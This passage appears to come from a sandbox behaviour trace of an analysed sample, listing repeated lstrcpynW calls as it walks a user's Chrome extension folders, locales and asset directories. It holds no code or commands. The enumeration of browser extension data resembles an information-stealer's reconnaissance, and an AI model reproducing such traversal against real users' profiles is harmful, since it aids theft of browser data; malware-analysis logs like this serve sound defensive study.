Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da" [0111.415] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs" [0111.416] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca" [0111.416] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg" [0111.416] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images" [0111.417] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html" [0111.417] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css" [0111.418] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi" [0111.418] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0" [0111.419] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata" [0111.419] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales" [0111.420] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu" [0111.420] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW" [0111.421] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK" [0111.421] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN" [0111.421] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi" [0111.422] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur" [0111.422] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk" [0111.423] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr" [0111.423] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th" [0111.423] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te" [0111.424] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta" [0111.424] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw" [0111.425] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv" [0111.427] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr" [0111.427] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl" [0111.428] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk" [0111.428] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si" [0111.428] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru" [0111.429] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro" [0111.429] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT" [0111.430] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR" [0111.430] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl" [0111.430] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no" [0111.431] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl" [0111.431] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne" [0111.432] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms" [0111.432] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr" [0111.433] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn" [0111.433] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml" [0111.434] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv" [0111.434] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 